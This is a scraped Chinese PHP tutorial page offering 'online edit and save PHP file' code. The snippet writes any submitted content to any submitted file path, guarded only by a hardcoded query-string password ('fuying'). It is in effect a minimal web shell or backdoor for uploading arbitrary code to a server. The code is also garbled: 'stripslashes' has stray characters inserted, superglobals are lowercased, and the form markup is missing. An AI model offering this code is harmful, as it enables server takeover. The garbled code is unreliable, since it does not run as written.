当前位置:Gxlcms > PHP教程 > 简单php在线编辑保存php文件实现代码_PHP教程

简单php在线编辑保存php文件实现代码_PHP教程

时间:2021-07-01 10:21:17 帮助过:4人阅读

简单php教程在线编辑保存php文件实现代码
*/
if($_get['login']=='fuying'){
header("content-type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_post as $k=>$v) $_post[$k] = strips教程lashes($v);
?>

save to:









if(isset($_post['file']))
{
$fp = @fopen($_post['file'],'wb');
echo @fwrite($fp,$_post['text']) ? 'succed!' : 'faled!';
@fclose($fp);
}
}


www.bkjia.comtruehttp://www.bkjia.com/PHPjc/444816.htmlTechArticle简单php教程在线编辑保存php文件实现代码 */ if($_get['login']=='fuying'){ header(content-type: text/html; charset=gb2312); if(get_magic_quotes_gpc()) foreach($_post a...

人气教程排行